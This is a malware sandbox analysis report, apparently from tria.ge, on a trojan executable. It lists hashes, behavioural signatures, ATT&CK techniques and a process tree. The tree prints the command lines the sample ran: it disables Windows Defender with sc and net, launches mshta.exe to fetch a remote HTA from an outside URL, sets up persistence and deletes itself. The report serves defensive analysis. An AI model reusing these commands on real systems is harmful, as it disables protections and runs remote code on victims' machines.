Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

3

2dab1dbc69...18.exe

windows7-x64

10

2dab1dbc69...18.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    150s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240704-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240704-enlocale:en-usos:windows10-2004-x64system
  • submitted
    08/07/2024, 20:15

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    2dab1dbc69f84a8582d118aeb9605c52_JaffaCakes118.exe

  • Size

    2.2MB

  • MD5

    2dab1dbc69f84a8582d118aeb9605c52

  • SHA1

    6ebebcfc0f3d01c11afe21fe95a67af0b5578ba1

  • SHA256

    13bea9694a6b9ca62d29c5fb3337231b406615f10e103889b337251f97814775

  • SHA512

    c0adc6b26e986098677f8b5b1bd34c9bfe13025b00f4efafd4656c3beb7115269dd971e373606c3211aba3388e53080a7ba79280325736c513b46d8f2bbae8d4

  • SSDEEP

    49152:dRRIZ2dUIPYiiqowvq00p7PiKXTqp/nYi:Lw/IrwzXOp/Yi

Score
10/10
evasionexecutionpersistencetrojan

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://softscoreinc.com/soft-usage/favicon.ico?0=1200&1=MPPNGHQZ&2=i-s&3=104&4=9200&5=6&6=2&7=919041&8=1033

Signatures

  • Disables service(s) 3 TTPs
    evasionexecution
  • Modifies WinLogon for persistence 2 TTPs 1 IoCs
    persistence
  • UAC bypass 3 TTPs 3 IoCs
    evasiontrojan
  • Event Triggered Execution: Image File Execution Options Injection 1 TTPs 16 IoCs
    persistence
  • Stops running service(s) 4 TTPs
    evasionexecution
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
    evasiontrojan
  • Launches sc.exe 6 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of FindShellTrayWindow 4 IoCs
  • Suspicious use of WriteProcessMemory 39 IoCs
  • System policy modification 1 TTPs 4 IoCs
    evasion

Processes

  • C:\Users\Admin\AppData\Local\Temp\2dab1dbc69f84a8582d118aeb9605c52_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\2dab1dbc69f84a8582d118aeb9605c52_JaffaCakes118.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4952
    • C:\Windows\SysWOW64\sc.exe
      sc stop WinDefend
      2⤵
      • Launches sc.exe
      PID:3852
    • C:\Windows\SysWOW64\sc.exe
      sc config WinDefend start= disabled
      2⤵
      • Launches sc.exe
      PID:1916
    • C:\Windows\SysWOW64\net.exe
      net stop msmpsvc
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3160
      • C:\Windows\SysWOW64\net1.exe
        C:\Windows\system32\net1 stop msmpsvc
        3⤵
          PID:244
      • C:\Windows\SysWOW64\sc.exe
        sc config msmpsvc start= disabled
        2⤵
        • Launches sc.exe
        PID:4620
      • C:\Users\Admin\AppData\Roaming\Microsoft\nrrlgu.exe
        C:\Users\Admin\AppData\Roaming\Microsoft\nrrlgu.exe
        2⤵
        • Modifies WinLogon for persistence
        • UAC bypass
        • Event Triggered Execution: Image File Execution Options Injection
        • Executes dropped EXE
        • Checks whether UAC is enabled
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of WriteProcessMemory
        • System policy modification
        PID:3280
        • C:\Windows\SysWOW64\sc.exe
          sc stop WinDefend
          3⤵
          • Launches sc.exe
          PID:2832
        • C:\Windows\SysWOW64\sc.exe
          sc config WinDefend start= disabled
          3⤵
          • Launches sc.exe
          PID:2692
        • C:\Windows\SysWOW64\net.exe
          net stop msmpsvc
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2964
          • C:\Windows\SysWOW64\net1.exe
            C:\Windows\system32\net1 stop msmpsvc
            4⤵
              PID:1704
          • C:\Windows\SysWOW64\sc.exe
            sc config msmpsvc start= disabled
            3⤵
            • Launches sc.exe
            PID:4260
          • C:\Windows\SysWOW64\mshta.exe
            mshta.exe "http://softscoreinc.com/soft-usage/favicon.ico?0=1200&1=MPPNGHQZ&2=i-s&3=104&4=9200&5=6&6=2&7=919041&8=1033"
            3⤵
              PID:4192
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\2DAB1D~1.EXE" >> NUL
            2⤵
              PID:4084

          Network

          MITRE ATT&CK Enterprise v15

          Reconnaissance

          Resource Development

          Initial Access

          Execution

          System Services

          2
          T1569

          Service Execution

          2
          T1569.002

          Persistence

          Boot or Logon Autostart Execution

          1
          T1547

          Winlogon Helper DLL

          1
          T1547.004

          Create or Modify System Process

          2
          T1543

          Windows Service

          2
          T1543.003

          Event Triggered Execution

          1
          T1546

          Image File Execution Options Injection

          1
          T1546.012

          Privilege Escalation

          Abuse Elevation Control Mechanism

          1
          T1548

          Bypass User Account Control

          1
          T1548.002

          Boot or Logon Autostart Execution

          1
          T1547

          Winlogon Helper DLL

          1
          T1547.004

          Create or Modify System Process

          2
          T1543

          Windows Service

          2
          T1543.003

          Event Triggered Execution

          1
          T1546

          Image File Execution Options Injection

          1
          T1546.012

          Defense Evasion

          Abuse Elevation Control Mechanism

          1
          T1548

          Bypass User Account Control

          1
          T1548.002

          Impair Defenses

          2
          T1562

          Disable or Modify Tools

          1
          T1562.001

          Modify Registry

          3
          T1112

          Credential Access

          Discovery

          Query Registry

          1
          T1012

          System Information Discovery

          3
          T1082

          Lateral Movement

          Collection

          Command and Control

          Exfiltration

          Impact

          Service Stop

          2
          T1489

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Roaming\Microsoft\nrrlgu.exe
            Filesize

            2.2MB

            MD5

            2dab1dbc69f84a8582d118aeb9605c52

            SHA1

            6ebebcfc0f3d01c11afe21fe95a67af0b5578ba1

            SHA256

            13bea9694a6b9ca62d29c5fb3337231b406615f10e103889b337251f97814775

            SHA512

            c0adc6b26e986098677f8b5b1bd34c9bfe13025b00f4efafd4656c3beb7115269dd971e373606c3211aba3388e53080a7ba79280325736c513b46d8f2bbae8d4

            Download Submit

          • memory/3280-33-0x0000000000400000-0x000000000082F000-memory.dmp

            Filesize

            4.2MB

            Download

          • memory/3280-29-0x0000000000400000-0x000000000082F000-memory.dmp

            Filesize

            4.2MB

            Download

          • memory/4952-24-0x0000000003530000-0x0000000003531000-memory.dmp

            Filesize

            4KB

            Download

          • memory/4952-22-0x0000000000A90000-0x0000000000A91000-memory.dmp

            Filesize

            4KB

            Download

          • memory/4952-4-0x0000000002680000-0x0000000002681000-memory.dmp

            Filesize

            4KB

            Download

          • memory/4952-8-0x0000000003510000-0x0000000003730000-memory.dmp

            Filesize

            2.1MB

            Download

          • memory/4952-17-0x0000000003510000-0x0000000003511000-memory.dmp

            Filesize

            4KB

            Download

          • memory/4952-16-0x0000000003510000-0x0000000003511000-memory.dmp

            Filesize

            4KB

            Download

          • memory/4952-15-0x0000000003730000-0x0000000003731000-memory.dmp

            Filesize

            4KB

            Download

          • memory/4952-14-0x0000000003510000-0x0000000003511000-memory.dmp

            Filesize

            4KB

            Download

          • memory/4952-13-0x0000000003520000-0x0000000003521000-memory.dmp

            Filesize

            4KB

            Download

          • memory/4952-18-0x0000000003510000-0x0000000003512000-memory.dmp

            Filesize

            8KB

            Download

          • memory/4952-12-0x0000000003520000-0x0000000003521000-memory.dmp

            Filesize

            4KB

            Download

          • memory/4952-0-0x0000000000400000-0x000000000082F000-memory.dmp

            Filesize

            4.2MB

            Download

          • memory/4952-23-0x0000000000AA0000-0x0000000000AA1000-memory.dmp

            Filesize

            4KB

            Download

          • memory/4952-5-0x00000000026F0000-0x00000000026F1000-memory.dmp

            Filesize

            4KB

            Download

          • memory/4952-21-0x0000000003520000-0x0000000003521000-memory.dmp

            Filesize

            4KB

            Download

          • memory/4952-20-0x0000000003500000-0x0000000003502000-memory.dmp

            Filesize

            8KB

            Download

          • memory/4952-19-0x0000000003560000-0x0000000003561000-memory.dmp

            Filesize

            4KB

            Download

          • memory/4952-11-0x0000000003520000-0x0000000003521000-memory.dmp

            Filesize

            4KB

            Download

          • memory/4952-10-0x0000000003520000-0x0000000003521000-memory.dmp

            Filesize

            4KB

            Download

          • memory/4952-9-0x0000000003520000-0x0000000003521000-memory.dmp

            Filesize

            4KB

            Download

          • memory/4952-3-0x0000000002690000-0x0000000002691000-memory.dmp

            Filesize

            4KB

            Download

          • memory/4952-2-0x00000000026A0000-0x00000000026A1000-memory.dmp

            Filesize

            4KB

            Download

          • memory/4952-6-0x00000000026C0000-0x00000000026C1000-memory.dmp

            Filesize

            4KB

            Download

          • memory/4952-7-0x0000000002720000-0x0000000002721000-memory.dmp

            Filesize

            4KB

            Download

          • memory/4952-32-0x0000000002510000-0x000000000256A000-memory.dmp

            Filesize

            360KB

            Download

          • memory/4952-31-0x0000000000400000-0x000000000082F000-memory.dmp

            Filesize

            4.2MB

            Download

          • memory/4952-1-0x0000000002510000-0x000000000256A000-memory.dmp

            Filesize

            360KB

            Download